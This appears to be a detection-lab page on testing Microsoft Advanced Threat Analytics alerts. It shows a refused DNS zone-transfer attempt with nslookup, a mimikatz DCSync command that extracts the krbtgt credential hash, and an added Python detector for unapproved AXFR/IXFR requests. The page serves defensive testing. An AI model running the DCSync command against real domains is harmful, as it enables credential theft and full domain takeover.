Advanced Threat Analytics (ATA) is an on-premises platform that helps protect your enterprise from multiple types of advanced targeted cyber attacks and insider threats.
Having Microsoft ATA allows defenders to test detections and gain a better sense of ATA’s capabilities. It also allows offensive security professionals to determine which tools and techniques Microsoft ATA will detect.
To attempt a zone transfer, run the following from a cmd.exe prompt:

    C:\Users\vagrant>nslookup
    Default Server: UnKnown
    Address: 192.168.38.102

    > ls -d windomain.local
    [UnKnown]
    *** Can't list domain windomain.local: Query refused
    The DNS server refused to transfer the zone windomain.local to your computer. If this is incorrect, check the zone transfer security settings for windomain.local on the DNS server at IP address 192.168.38.102.
To attempt a DCSync:

    c:\tools\mimikatz\x64\mimikatz.exe lsadump::dcsync /domain:windomain.local /user:krbtgt
Both of these activities should trigger Microsoft ATA alerts within a few minutes.
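To confirm the zone-transfer test independently of ATA, the added example below (not part of the original page) parses a DNS-over-TCP query and flags AXFR/IXFR requests from hosts that are not approved secondaries. The function names, the client addresses and the allow-list are assumptions made for illustration; the sample query is constructed.

```python
import struct

AXFR, IXFR = 252, 251  # DNS QTYPEs: full and incremental zone transfer

def parse_question(msg: bytes):
    """Return (qname, qtype) of the first question in a raw DNS message."""
    if len(msg) < 12 or struct.unpack("!H", msg[4:6])[0] < 1:
        raise ValueError("truncated header or empty question section")
    labels, pos = [], 12
    while True:
        if pos >= len(msg):
            raise ValueError("truncated QNAME")
        length = msg[pos]
        pos += 1
        if length == 0:  # root label terminates the name
            break
        if length & 0xC0 or pos + length > len(msg):
            raise ValueError("invalid label in question")
        labels.append(msg[pos:pos + length].decode("ascii", "replace"))
        pos += length
    if pos + 4 > len(msg):
        raise ValueError("truncated QTYPE/QCLASS")
    qtype, _qclass = struct.unpack("!HH", msg[pos:pos + 4])
    return ".".join(labels).lower(), qtype

def check_tcp_query(src_ip, tcp_payload, allowed_secondaries):
    """Return an alert string for a zone-transfer request from an unapproved host."""
    if len(tcp_payload) < 2:
        raise ValueError("missing DNS-over-TCP length prefix")
    (length,) = struct.unpack("!H", tcp_payload[:2])
    qname, qtype = parse_question(tcp_payload[2:2 + length])
    if qtype in (AXFR, IXFR) and src_ip not in allowed_secondaries:
        kind = "AXFR" if qtype == AXFR else "IXFR"
        return f"ALERT zone transfer ({kind}) for {qname} from {src_ip}"
    return None

def build_query(qname, qtype, txid=0x1234):
    """Build a constructed DNS-over-TCP query, used here only as sample input."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    name = b"".join(bytes([len(l)]) + l.encode() for l in qname.split(".")) + b"\x00"
    msg = header + name + struct.pack("!HH", qtype, 1)
    return struct.pack("!H", len(msg)) + msg

if __name__ == "__main__":
    # Constructed sample: client 192.168.38.50 is not in the allow-list.
    sample = build_query("windomain.local", AXFR)
    print(check_tcp_query("192.168.38.50", sample, {"192.168.38.60"}))
```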